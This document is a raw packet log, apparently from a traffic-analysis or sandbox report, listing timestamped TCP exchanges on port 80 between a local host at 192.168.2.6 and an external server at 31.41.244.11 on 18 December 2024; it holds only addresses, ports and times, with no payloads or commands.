                                                                                                                                                              Dec 18, 2024 11:47:35.957878113 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:35.965286016 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:35.965431929 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:35.965461016 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:35.965578079 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:35.970298052 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:35.970351934 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:35.970366955 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:35.970479965 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:35.975087881 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:35.975200891 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:35.975271940 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:35.979876041 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:35.979999065 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:35.980022907 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:35.980089903 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:35.984663010 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:35.984760046 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:35.984778881 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:35.984801054 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:35.989506006 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:35.989571095 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:35.989592075 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:35.989615917 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:35.994286060 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:35.994354963 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:35.994436979 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:35.994477987 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:35.999038935 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:35.999165058 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.000914097 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.003772020 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.003878117 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.003900051 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.003917933 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.008630991 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.008706093 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.008706093 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.008743048 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.013375044 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.013461113 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.013505936 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.013516903 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.018204927 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.018296003 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.018321991 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.018347025 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.022939920 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.023112059 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.023163080 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.027715921 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.027792931 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.027822018 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.027905941 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.032517910 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.032604933 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.032630920 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.032644987 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.137244940 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.137340069 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.137387037 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.137502909 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.138582945 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.138708115 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.138757944 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.142986059 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.143079996 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.143112898 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.143210888 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.147435904 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.147490978 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.147547960 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.147588968 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.151849985 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.151864052 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.151976109 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.155961037 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.156013012 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.156063080 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.159904957 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.159953117 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.159966946 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.161252975 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.163866043 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.163952112 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.163976908 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.163991928 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.167798996 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.167850018 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.167912006 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.171575069 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.171624899 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.171665907 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.171725988 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.175443888 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.175582886 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.175637960 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.179385900 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.179442883 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.179476023 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.180819988 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.183141947 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.183307886 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.183391094 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.183455944 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.187037945 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.187096119 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.187242985 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.187278986 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.190845966 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.190892935 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.190953970 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.191066027 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.194686890 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.194732904 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.194823980 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.194951057 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.198574066 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.198587894 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.198743105 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.202419043 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.202548027 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.202560902 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.202769041 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.206366062 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.206407070 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.206465960 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.206572056 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.210145950 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.210241079 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.210401058 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.210401058 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.214075089 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.214159966 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.214186907 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.214205980 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.217896938 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.217968941 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.218086004 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.218133926 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.221729040 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.221837044 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.221853971 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.222085953 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.225619078 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.225754976 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.225805044 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.229435921 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.229688883 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.229691982 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.229964018 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.233316898 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.233365059 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.233448029 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.233504057 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.237371922 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.237420082 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.329379082 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.329459906 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.329464912 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.329531908 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.330960989 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.330997944 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.331037998 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.331280947 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.334214926 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.334256887 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.334326029 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.334417105 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.337207079 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.337269068 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.338063955 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.340476036 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.340523005 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.340573072 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.340864897 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.343327999 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.343375921 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.343414068 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.343635082 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.345818996 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.345977068 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.346005917 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.346088886 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.349098921 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.349277973 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.349679947 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.351804972 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.351891041 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.351938009 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.354439974 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.354567051 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.354614973 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.357336044 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.357431889 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.357451916 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.357484102 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.360096931 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.360234022 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.360286951 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.360286951 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.362734079 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.362818956 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.362867117 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.362867117 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.365530968 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.365627050 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.365648031 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.365664005 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.368777037 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.368845940 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.368875980 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.368886948 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.371826887 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.371921062 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.371942043 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.371958017 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.374392986 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.374473095 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.374512911 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.377017021 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.377110004 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.377111912 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.378344059 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.379889011 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.379997015 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.380016088 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.380170107 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.382436037 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.382528067 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.382550001 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.382566929 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.384987116 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.385036945 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.385129929 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.385171890 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.387588024 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.387664080 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.387706995 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.388083935 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.390418053 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.390496969 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.390537024 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.393006086 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.393094063 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.393153906 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.393273115 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.395688057 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.395781040 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.395804882 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.395817995 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.398297071 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.398452044 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.398469925 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.398484945 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.400856972 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.400903940 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.400926113 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.400954962 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.403884888 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.403913975 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.403996944 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.406450987 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.406605959 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.406631947 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.406650066 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.409118891 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.409193993 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.409307957 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.409545898 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.411544085 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.411613941 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.411642075 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.411655903 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.414099932 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.414186954 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.414227009 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.416811943 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.416893959 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.416896105 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.416946888 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.419996977 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.420063019 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.420129061 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.420310020 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.422557116 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.422693968 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.425129890 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.425929070 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.425983906 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.426132917 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.426242113 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.429239988 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.429333925 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.429619074 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.429702044 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.431689024 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.431794882 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.431808949 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.431984901 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.433824062 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.433917046 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.433939934 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.433960915 CET4985980192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:36.436286926 CET804985931.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:36.436424017 CET804985931.41.244.11192.168.2.6
